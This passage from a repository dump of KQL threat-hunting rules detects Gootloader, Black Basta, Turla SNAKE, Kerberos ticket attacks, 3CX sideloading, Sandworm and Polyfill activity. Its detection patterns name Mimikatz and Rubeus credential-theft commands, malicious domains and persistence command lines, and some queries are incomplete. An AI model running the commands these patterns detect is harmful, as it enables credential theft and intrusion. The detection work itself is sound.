16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | 23 | #### References 24 | - https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf 25 | - https://kqlquery.com/ 26 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | DeviceNetworkEvents 31 | | where FileName =~ "rundll32.exe" 32 | | where isnull(ProcessCommandLine) 33 | 34 | ```KQL 35 | DeviceProcessEvents 36 | | where InitiatingProcessFileName =~ "rundll32.exe" 37 | | where isnull(InitiatingProcessCommandLine) 38 | -------------------------------------------------------------------------------- /nf_mal_ttp_cve-2023-36025_phemedroneStealer.md: -------------------------------------------------------------------------------- 1 | # *CVE-2023-36025 Exploited for Defense Evasion in Phemedrone Stealer Campaign* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1218.002 | Signed Binary Proxy Execution: Control Panel |[Control Panel](https://attack.mitre.org/techniques/T1218/002/)| 10 | 11 | #### Description 12 | This set of hunt queries delves into the Phemedrone Stealer campaign's exploitation of CVE-2023-36025, the Windows Defender SmartScreen Bypass vulnerability, addressing its defense evasion and facilitating investigation of the malware's payload behaviours and TTPs. 13 | 14 | #### Risk 15 | This collection of hunt queries aims to detect behaviours associated with malware exploitation of CVE-2023-36025 and subsequent TTPs as part of its intrusion set or attack flow. 
16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** https://github.com/m4nbat 20 | - **Twitter:** https://twitter.com/knappresearchlb 21 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 22 | - **Website:** 23 | 24 | #### References 25 | - https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html 26 | - https://github.com/FalconForceTeam/FalconFriday/blob/master/Defense%20Evasion/T1218-WIN-001.md 27 | - https://medium.com/falconforce/falconfriday-process-injection-and-malicious-cpl-files-0xff03-8ba1ee5da64 28 | 29 | ## Defender For Endpoint 30 | 31 | ### Signed Binary Proxy Execution: Control Panel (T1218.002)​ 32 | 33 | ```KQL 34 | // source FalconForce https://medium.com/falconforce/falconfriday-process-injection-and-malicious-cpl-files-0xff03-8ba1ee5da64 35 | // https://github.com/FalconForceTeam/FalconFriday/blob/master/Defense%20Evasion/T1218-WIN-001.md 36 | //Fairly accurate. Depends on ATP for "Global Prevalence" to filter out false positives. 
37 | let suspiciousCPLs = DeviceImageLoadEvents 38 | | where FileName endswith ".cpl" 39 | | summarize by SHA1 40 | | invoke FileProfile(SHA1, 1000) 41 | | where ((isempty(Signer) or not(IsCertificateValid)) and GlobalPrevalence < 100) or GlobalPrevalence < 50; 42 | DeviceImageLoadEvents 43 | | where SHA1 has_any (suspiciousCPLs) and ActionType == "ImageLoaded" 44 | ``` 45 | ## Sentinel 46 | ```KQL 47 | // N/A due to functions being limited to MDE Advanced Hunting 48 | ``` 49 | -------------------------------------------------------------------------------- /nf_mal_ttp_t1620_gootloader.md: -------------------------------------------------------------------------------- 1 | # PowerShell (powershell.exe) Performing a Reflective Load of a .NET Assembly 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1059.001 | Command and Scripting Interpreter: PowerShell | [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/) | 10 | | T1620 | Reflective Code Loading | [Reflective Code Loading](https://attack.mitre.org/techniques/T1620/) | 11 | 12 | #### Description 13 | This detection rule identifies instances where PowerShell is loading a .NET assembly into memory for execution. This is indicative of threats like Gootloader, which utilize `System.Reflection` to load malicious assemblies for in-memory execution. 14 | 15 | #### Risk 16 | Reflective loading of assemblies is a technique often used by malicious actors to execute code stealthily. This detection captures potentially harmful .NET assembly loads, which could indicate malware such as Gootloader or other in-memory threats. 
17 | 18 | #### Author 19 | - **Name:** Gavin Knapp 20 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 21 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 22 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 23 | 24 | #### References 25 | - https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf 26 | - https://kqlquery.com/ 27 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | DeviceProcessEvents 32 | | where FileName =~ "powershell.exe" 33 | | where ProcessCommandLine has_all ("Reflection.Assembly", "Load", "byte[]") 34 | -------------------------------------------------------------------------------- /nf_ttp_blackbasta_quickassist.md: -------------------------------------------------------------------------------- 1 | // Look for anomalous emails being received that contain keywords in the subject linked to email bombing campaigns 2 | EmailEvents 3 | | where EmailDirection == "Inbound" and Subject has_all ("subscription","confirm") 4 | | make-series Emailcount = count() 5 | on Timestamp 6 | step 1h 7 | by RecipientObjectId, SourceTenant = TenantId 8 | | extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount) 9 | | mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp 10 | | where Anomalies != 0 11 | | where AnomalyScore >= 10 // can be tweaked to suit each hunt 12 | | where Emailcount > 5 // only return instances where there are more than 5 emails in the period with the subject keyword matches 13 | 14 | // Search for the email results based on the results of the above query 15 | EmailEvents 16 | | where RecipientObjectId in ("ENTER YOUR OBJECT ID E.G. 
71d04be0-d33f-4cc1-a097-7086d7c7069d") 17 | | where Subject has_all ("subscription","confirm") // Mirror the keywords you used for the original anomaly hunt 18 | 19 | //Search for quick assist usage in the environment 20 | DeviceNetworkEvents 21 | | where InitiatingProcessCommandLine contains "QuickAssist.exe" and RemoteUrl contains "remoteassistance.support.services.microsoft.com" 22 | 23 | // Follow-on activity leading to Black Basta ransomware - curl activity 24 | let commands = datatable(command:string)["o","insecure","http"]; 25 | let net_iocs = datatable(ioc:string)["upd7","upd7a","upd9","upd5","github"]; 26 | DeviceNetworkEvents 27 | | where TimeGenerated > ago(25m) 28 | | where (InitiatingProcessVersionInfoOriginalFileName =~ "curl.exe" or InitiatingProcessFileName =~ "curl.exe") and InitiatingProcessCommandLine has_any (file_ext) and InitiatingProcessCommandLine matches regex @"(upd7.|upd7a.|upd9.|upd5.)" 29 | -------------------------------------------------------------------------------- /nf_ttp_execution_apt_turla.md: -------------------------------------------------------------------------------- 1 | # SNAKE Malware Execution Tactics 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Tactic(s) 6 | 7 | | Tactic ID | Title | Link | 8 | | --- | --- | --- | 9 | | TA0002 | Execution | [Execution](https://attack.mitre.org/tactics/TA0002/) | 10 | 11 | #### MITRE ATT&CK Technique(s) 12 | 13 | | Technique ID | Title | Link | 14 | | --- | --- | --- | 15 | | T1059 | Command and Scripting Interpreter | [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/) | 16 | | T1068 | Exploitation for Privilege Escalation | [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068/) | 17 | 18 | #### Description 19 | Detects execution-related activities tied to the SNAKE malware as reported by CISA. 
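This includes identifying kernel driver file indicators, suspicious filenames associated with SNAKE installation, specific command-line arguments, and installation binaries used during the malware execution.

#### Risk
The detection covers the execution of potentially harmful payloads and processes associated with the SNAKE malware. Attackers may leverage this for privilege escalation and to maintain persistence within compromised systems.

#### Author
- **Name:** Gavin Knapp
- **Github:** [https://github.com/m4nbat](https://github.com/m4nbat)
- **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb)
- **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/)
- **Website:**

#### References
- [CISA Report on Snake Malware](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)

---

## Queries

### Query 1 - SNAKE Malware Kernel Driver File Indicator

#### Description
This query detects the presence of a SNAKE malware kernel driver file indicator by monitoring the specific file path in `DeviceFileEvents`.

```KQL
// Verbatim (@) string so the backslashes in the path are literal rather than
// being read as escape sequences.
DeviceFileEvents
| where FolderPath =~ @'C:\Windows\System32\Com\Comadmin.dat'
```

### Query 2 - SNAKE Malware Installer Name Indicators

#### Description
This query detects file names associated with the SNAKE malware installer as described in the CISA report, such as jpsetup.exe or jpinst.exe.

```KQL
DeviceFileEvents
| where (FolderPath endswith @'\jpsetup.exe' or FolderPath endswith @'\jpinst.exe')
```

### Query 3 - Potential SNAKE Malware Installation CLI Arguments Indicator

#### Description
This query detects specific command line arguments seen during the installation of SNAKE malware. The command line pattern includes a sequence of alphanumeric characters in specific formats as observed by CISA.

```KQL
// 64 hex characters followed by 16 hex characters, each preceded by whitespace.
// Verbatim strings keep the regex's \s intact.
DeviceProcessEvents
| where ProcessCommandLine matches regex @'(?i)\s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16}'
    or InitiatingProcessCommandLine matches regex @'(?i)\s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16}'
```

### Query 4 - Potential SNAKE Malware Installation Binary Indicator

#### Description
This query identifies the installation binary used by SNAKE malware during execution, focusing on files named jpsetup.exe and jpinst.exe and ensuring that the command line does not match certain benign processes or is not empty.

```KQL
// Either the process itself or its parent is jpsetup.exe/jpinst.exe, and the
// corresponding command line carries arguments beyond the bare binary name.
DeviceProcessEvents
| where ((FolderPath endswith @'\jpsetup.exe' or FolderPath endswith @'\jpinst.exe')
        and not ((ProcessCommandLine in~ ('jpinst.exe', 'jpinst', 'jpsetup.exe', 'jpsetup'))
            or ProcessCommandLine == '' or isempty(ProcessCommandLine)))
    or ((InitiatingProcessFolderPath endswith @'\jpsetup.exe' or InitiatingProcessFolderPath endswith @'\jpinst.exe')
        and not ((InitiatingProcessCommandLine in~ ('jpinst.exe', 'jpinst', 'jpsetup.exe', 'jpsetup'))
            or InitiatingProcessCommandLine == '' or isempty(InitiatingProcessCommandLine)))
```
--------------------------------------------------------------------------------
/nf_ttp_generic_kerberos_attacks.md:
--------------------------------------------------------------------------------
# Kerberos attacks

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
|--------------|-----------------------------|-------------------------------------------|
|T1649 |Steal or Forge Authentication Certificates | https://attack.mitre.org/techniques/T1649/ |
|T1558.003 |Kerberoasting | https://attack.mitre.org/techniques/T1558/003/ |
|T1558 |Steal or Forge Kerberos Tickets | https://attack.mitre.org/techniques/T1558/ |
|T1558.004 |AS-REP Roasting | https://attack.mitre.org/techniques/T1558/004/ |
|T1558.001 |Golden Ticket | https://attack.mitre.org/techniques/T1558/001/ |
|T1550.003 |Pass the Ticket | https://attack.mitre.org/techniques/T1550/003/ |
|T1110 |Brute Force | https://attack.mitre.org/techniques/T1110/ |
|T1558.002 |Silver Ticket | https://attack.mitre.org/techniques/T1558/002/ |

#### Description

#### Risk

#### Author
- **Name:** Gavin Knapp
- **Github:** [https://github.com/m4nbat](https://github.com/m4nbat)
- **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb)
- **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/)
- **Website:**

#### References
- Microsoft TI (Closed)
- [stuff](link)

## Advanced Hunting

### Microsoft Defender Antivirus Detections

```KQL
AlertInfo
| where Title has_any ("Successful logon using overpass-the-hash with potentially stolen credentials","Command line used for possible overpass-the-hash")
```

#### The following alerts might also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report:

```KQL
AlertInfo
| where Title has_any ("AD reconnaissance activities","Process related to possible AD reconnaissance","Suspicious Lsass Process Access","Bloodhound post-exploitation tool")
```

### Microsoft Defender for Identity Detection
```KQL
IdentityDirectoryEvents
| where ActionType == "Potential lateral movement path identified"
| project Timestamp, ActionType, Application, AccountName, AccountDomain, AccountSid, AccountDisplayName, DeviceName, AdditionalFields
```

### Common Mimikatz command lines

```KQL
DeviceProcessEvents
| where ProcessCommandLine has_any ('sekurlsa::tickets /export', 'kerberos::ptt')
| project Timestamp, AccountName, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine
```

### Common Rubeus command lines

```KQL
// Terms such as ' renew' and ' brute' are ordinary words and will also match
// unrelated command lines; expect to triage results rather than alert on them.
DeviceProcessEvents
| where ProcessCommandLine has_any ('ptt /ticket', ' monitor /interval', ' asktgt', ' asktgs', ' golden', ' silver', ' kerberoast', ' asreproast', ' renew', ' brute')
| project Timestamp, AccountName, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine
```
--------------------------------------------------------------------------------
/nf_ttp_ioc_3cx_DLL_SideLoading_IoC_Kusto.md:
--------------------------------------------------------------------------------
# 3CX Users Under DLL-Sideloading Attack

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
| --- | --- | --- |
| T1073 | DLL Side-Loading | https://attack.mitre.org/techniques/T1073/ |
| T1071 | Application Layer Protocol | https://attack.mitre.org/techniques/T1071/ |

#### Description
Sophos X-Ops is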
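tracking a developing situation concerning a potential supply-chain attack against the 3CX Desktop application, possibly by a nation-state-related group. This threat is notable for its use of DLL sideloading.

The attack involves compromising the 3CXDesktopApp and using it to sideload malicious DLLs onto targeted systems. This page provides an overview of the attack, threat analysis, and queries that can be used for detection in Microsoft Defender for Endpoint (MDE) and Azure Sentinel.

#### Risk
This detection aims to identify and mitigate risks related to supply chain attacks utilizing DLL-sideloading techniques. Attackers may leverage compromised software to gain unauthorized access to sensitive systems or data.

#### Author
- **Name:** Gavin Knapp
- **Github:** [https://github.com/m4nbat](https://github.com/m4nbat)
- **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb)
- **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/)
- **Website:**

#### References
- https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/
- https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/
- https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv

## Defender For Endpoint
### Combined IOC hunt
```KQL
// Pull the URL and SHA256 indicators from the Sophos IoC CSV (columns: indicator, data, note).
// The two `indicator` filters were previously swapped between the lets; the union made that
// harmless, but each name now matches what it holds.
let urlioc = externaldata(indicator:string, data:string, note:string)
    [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"]
    with(format="csv",ignoreFirstRecord=true)
    | where indicator =~ "url"
    | distinct data;
let sha256ioc = externaldata(indicator:string, data:string, note:string)
    [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"]
    with(format="csv",ignoreFirstRecord=true)
    | where indicator =~ "sha256"
    | distinct data;
// Re-fang defanged domains ("[.]" -> ".") and reduce to ONE column: has_any / in~
// only accept a single-column tabular expression, and the previous `extend` left
// both `data` and `iocs` in the result.
let iocs = union urlioc, sha256ioc
    | extend ioc = replace_regex(data, @"\[\.\]", ".")
    | distinct ioc;
DeviceEvents
| where RemoteUrl has_any (iocs) or SHA256 in~ (iocs)
```

### URL IOC hunt
```KQL
let urlioc = externaldata(indicator:string, data:string, note:string)
    [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"]
    with(format="csv",ignoreFirstRecord=true)
    | where indicator =~ "url"
    | extend iocs = replace_regex(data, @"\[\.\]",".")
    | distinct iocs;
DeviceEvents
| where RemoteUrl has_any (urlioc)
```

### File hash IOC hunt
```KQL
let sha256ioc = externaldata(indicator:string, data:string, note:string)
    [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"]
    with(format="csv",ignoreFirstRecord=true)
    | where indicator =~ "sha256"
    | distinct data;
DeviceFileEvents
| where SHA256 in~ (sha256ioc)
```
### Software hunt
```KQL
DeviceTvmSoftwareInventory
| where SoftwareName has_any ("3CXDesktopApp.exe", "3CX Desktop App")
```

### Software hunt 2
```KQL
DeviceNetworkEvents
| where InitiatingProcessFileName has_any ("3CXDesktopApp.exe","3CXDesktopApp","3CX")
```

--------------------------------------------------------------------------------
/nf_ttp_kapeka_sandworm.md:
--------------------------------------------------------------------------------
//Example QUEUESEED for the batch file
//TTP QUEUESEED malware behaviour
//UA CERT Article
//https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4
//https://cert.gov.ua/article/6278706
DeviceProcessEvents
| where ( ProcessCommandLine has_all ("%COMSPEC%",@"/c",@"%APPDATA%\",".bat") or InitiatingProcessCommandLine has_all ("%COMSPEC%",@"/c",@"%APPDATA%\",".bat") )

//Example KAPEKA for the batch file
//TTP KAPEKA malware behaviour
//UA CERT Article
//https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4
//https://cert.gov.ua/article/6278706
// The second operand previously repeated ProcessCommandLine, so the parent-process
// command line was never checked; it now mirrors the QUEUESEED query above.
DeviceProcessEvents
| where ( ProcessCommandLine has_all (@"C:\Windows\system32\cmd.exe",@"/c",@"C:\Users\",@"\AppData\",".bat") or InitiatingProcessCommandLine has_all (@"C:\Windows\system32\cmd.exe",@"/c",@"C:\Users\",@"\AppData\",".bat") )

//Scheduled task created for the backdoor's SENS API entry (KAPEKA)
//Scheduled Task Persistence Mechanisms
//https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4
//https://cert.gov.ua/article/6278706
DeviceProcessEvents
| where ProcessCommandLine has_all ("/c","schtasks","/create","/sc","ONSTART","/tn","Sens Api","/f","/np","/tr",".wll")

//Additional registry entries for the backdoor for SENS API (KAPEKA)
//Run-key Persistence Mechanism (the query below looks at the ...\CurrentVersion\Run key)
//https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4
//https://cert.gov.ua/article/6278706
DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet" and RegistryKey endswith @"\Windows\CurrentVersion\Run" and RegistryValueName =~ "Sens Api" and RegistryValueData has_all (@"rundll32.exe",@".wll",@"#1")
--------------------------------------------------------------------------------
/nf_ttp_polyfill_supplychain_attack.md:
--------------------------------------------------------------------------------
# Polyfill Supply Chain Attack Detection

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
| --- | --- | --- |
| T1071.001 | Application Layer Protocol: Web Protocols | [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001/) |

#### Description
This detection rule identifies network events related to the recent Polyfill supply chain attack where malicious domains such as `googie-anaiytics.com` and `kuurza.com` were used to exfiltrate data.

#### Risk
This detection rule addresses the risk of data exfiltration and potential compromise from the Polyfill supply chain attack. The malicious domains involved are indicators of compromise (IOCs) used to identify infected systems attempting to communicate with the attacker's infrastructure.

#### Author
- **Name:** Gavin Knapp
- **Github:** [https://github.com/m4nbat](https://github.com/m4nbat)
- **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb)
- **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/)
- **Website:**

#### References
- [Sansec Research on Polyfill Supply Chain Attack](https://sansec.io/research/polyfill-supply-chain-attack)
- https://kqlquery.com/
- https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules

## Defender For Endpoint

```KQL
// Query to detect HTTP connections to malicious domains
DeviceNetworkEvents
| where ActionType == @"HttpConnectionInspected"
| extend ConnectInfo = todynamic(AdditionalFields)
| extend HttpHost = tostring(ConnectInfo.host) // explicit string conversion so `contains` works on the dynamic field
| where HttpHost contains "googie-anaiytics.com" or HttpHost contains "kuurza.com"
```

```KQL
// Query to detect DNS responses for malicious domains
DeviceNetworkEvents
| where ActionType == "DnsQueryResponse"
| extend QueryInfo = todynamic(AdditionalFields)
| extend DnsQuery = tostring(QueryInfo.query) // explicit string conversion so `contains` works on the dynamic field
| where DnsQuery contains "googie-anaiytics.com" or DnsQuery contains "kuurza.com"
```
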
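--------------------------------------------------------------------------------
/nf_ttp_possibleExfiltrationViaUSB.md:
--------------------------------------------------------------------------------
# *Possible Exfiltration via USB Detection*

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
|--------------|-----------------------------------|-------------------------------------------------------|
| T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB | [Exfiltration Over Physical Medium: Exfiltration over USB](https://attack.mitre.org/techniques/T1052/001) |

#### Description
Adversaries such as insiders have been known to exfiltrate data via removable media such as USB devices.

#### Risk
Removable media including USB can present a data loss risk to organisations.

#### Author
- **Name:** Nathan Webb
- **Github:**
- **Twitter:**
- **LinkedIn:** [https://www.linkedin.com/in/nathanjohnwebb](https://www.linkedin.com/in/nathanjohnwebb)
- **Website:**

#### References
- [Threat hunt] Detecting Possible USB Data Exfiltration
  https://www.linkedin.com/pulse/threat-hunt-detecting-possible-usb-data-exfiltration-nathan-webb-t3ode?utm_source=share&utm_medium=member_android&utm_campaign=share_via

## Defender For Endpoint

```KQL
let LookBackPeriod=14d; // How long to look back for USB activity
let DetectionPeriod=1d; // only report device connections first seen within this period
let DeviceConnectedCopiedWindow=1h; // adjust to have a longer time range between device connected and files copied
let SystemDrive=dynamic(['C:', 'D:']); // add known system drive paths in here
DeviceEvents
| where Timestamp > ago(LookBackPeriod)
| where ActionType contains "PnpDeviceConnected"
| extend DeviceType = tostring(todynamic(AdditionalFields).ClassName)
| extend UsbId = tostring(todynamic(AdditionalFields).DeviceId)
| where DeviceType contains "drive" or DeviceType contains "disk"
// get a count of how many times that USB vendor and id has been inserted (this just identifies the type of device and is not a unique ID per USB device)
// bin our timestamp so we can join on this time window when searching for USB events
// NOTE(review): because Timestamp is part of the group-by, TimesDriveConnected counts
// connections within each window rather than across the whole LookBackPeriod — confirm intended
| summarize FirstSeen=min(Timestamp), TimesDriveConnected=count() by UsbId, bin(Timestamp, DeviceConnectedCopiedWindow), DeviceId, DeviceName
| where FirstSeen > ago(DetectionPeriod)
// do a join to get copied files from the host that occur within the same timeframe
| join (DeviceFileEvents
    | where Timestamp > ago(DetectionPeriod)
    | where ActionType == "FileCreated"
    | where FileOriginReferrerUrl contains @"\" // file has come from a windows path
    | extend SourceDrive=tostring(split(FileOriginReferrerUrl, @"\")[0]) // get the drive letter of the system path
    | extend DestDrive=tostring(split(FolderPath, @"\")[0]) // get the drive letter of where the file was written to
    | where SourceDrive has_any (SystemDrive) and not(DestDrive has_any (SystemDrive)) // a copy off the system drive
    | summarize FilesPathsCopied=make_set(FolderPath, 1000), FileCopiesCount=count() by SourceDrive, DestDrive, DeviceId, DeviceName, bin(Timestamp, DeviceConnectedCopiedWindow))
    on DeviceId, Timestamp
```
--------------------------------------------------------------------------------
/nf_ttp_shadowlink_sandworm.md:
--------------------------------------------------------------------------------
Sandworm - ShadowLink

//Malware related alert for this variant:
SecurityAlert
| where AlertName contains "ShadowLink"

//Persistence:
DeviceEvents
| where ActionType == 'ServiceInstalled'
| extend JSON = parse_json(AdditionalFields)
| where JSON.ServiceName has 'tor'
| extend SourceTenant = TenantId
// tid_lookup is not defined in this repository; presumably an environment-specific
// function/table mapping tenant ids to names (columns id, name) — confirm before use
| join kind=leftouter tid_lookup on $left.SourceTenant == $right.id
|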
project-away id 15 | | summarize count() by name 16 | -------------------------------------------------------------------------------- /nf_ttp_smoke-sandstorm_unusual_coreuicomponent.dll-behaviour.md: -------------------------------------------------------------------------------- 1 | # Smoke Sandstorm - SnailResin and SlugResin Infection Detection 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------|-------------------------------------------| 9 | | T1574.002 | Hijack Execution Flow: DLL Search Order Hijacking | [Hijack Execution Flow: DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/002/) | 10 | | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/) | 11 | 12 | #### Description 13 | SlugResin infection involves the use of a legitimate file to load a malicious binary through DLL search order hijacking, delivering the SlugResin backdoor onto the target's device. This backdoor grants the actor access to the compromised device, potentially leading to further malicious activities like malware deployment, credential theft, privilege escalation, and lateral movement. The infection involves a two-stage process with the SnailResin loader and SlugResin backdoor, both associated with the Smoke Sandstorm threat group. The infection chain includes the use of a zip file ("bringthemhome.zip") containing malicious DLL files and a benign executable, which leads to the execution of the backdoor and establishment of a command-and-control connection. 14 | 15 | #### Risk 16 | The risk addressed by this detection is the stealthy execution of malicious code through DLL hijacking, enabling persistent access and control over compromised systems. The ability of this technique to blend in with normal activity makes it particularly dangerous. 
17 | 18 | #### Author 19 | - **Name:** Gavin Knapp 20 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 21 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 22 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 23 | - **Website:** 24 | 25 | #### References 26 | - Microsoft TI (Closed) 27 | - [Microsoft Documentation on DLL Search Order Hijacking](https://docs.microsoft.com/en-us/security/engineering/dll-search-order-hijacking) 28 | 29 | ## Advanced Hunting 30 | 31 | ### Unusual CoreUIComponent.dll Behaviour Detection 32 | 33 | ```KQL 34 | DeviceImageLoadEvents 35 | | where FileName == 'CoreUIComponent.dll' 36 | | where not(FolderPath has_any (@"\Windows\System32", @"\Windows\SysWOW64", @"\winsxs\", @"\program files")) 37 | ``` 38 | 39 | ### Microsoft Defender Antivirus Detections 40 | 41 | ```KQL 42 | AlertInfo 43 | | where Title has_any ("An executable loaded an unexpected dll","DLL search order hijack","Possible Sideload stealer activity","Possible S1deload stealer activity","Smoke Sandstorm activity group") 44 | ``` 45 | ### Microsoft Defender for Endpoint Alerts 46 | 47 | ```KQL 48 | let malware = datatable (name:string)["Trojan:Win64/SnailResin","Backdoor:Win64/SlugResin","Trojan:Win32/BassBreaker"]; 49 | AlertInfo 50 | | join AlertEvidence on AlertId 51 | | extend Malware = tostring(parse_json(AdditionalFields).Name) 52 | | where ( EntityType =~ "Malware" ) and isnotempty(Malware) and Malware has_any(malware) 53 | ``` 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /nf_ttp_t1027-010_powershellEcodedCommand.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: PowerShell -encodedcommand switch 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 
| | T1027.010 | Obfuscated Files or Information: Command Obfuscation | [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010/)| 10 | 11 | #### Description 12 | Detection opportunity 4: PowerShell -encodedcommand switch 13 | 14 | We also observed at least one of these adversaries abusing the shortened -encoded PowerShell command switch to encode PowerShell commands. This is another common bit of tradecraft. The following should help detect and hunt for the behaviour. 15 | 16 | #### Risk 17 | FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recent intrusions. Adversaries may encode commands to evade defenses. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | //this will be noisy and no good for a SIEM analytic 32 | DeviceProcessEvents 33 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("-e","-en","-enc","-enco","-encod","-encode","-encoded","-encodedc","-encodedco","-encodedcom","-encodedcomm","-encodedcomma","-encodedcomman","-encodedcommand") 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | //this will be noisy and no good for a SIEM analytic 38 | DeviceProcessEvents 39 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("-e","-en","-enc","-enco","-encod","-encode","-encoded","-encodedc","-encodedco","-encodedcom","-encodedcomm","-encodedcomma","-encodedcomman","-encodedcommand") 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1059-001_powershell_windowsappsdir_fin7.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: PowerShell Launching Scripts From WindowsApps 
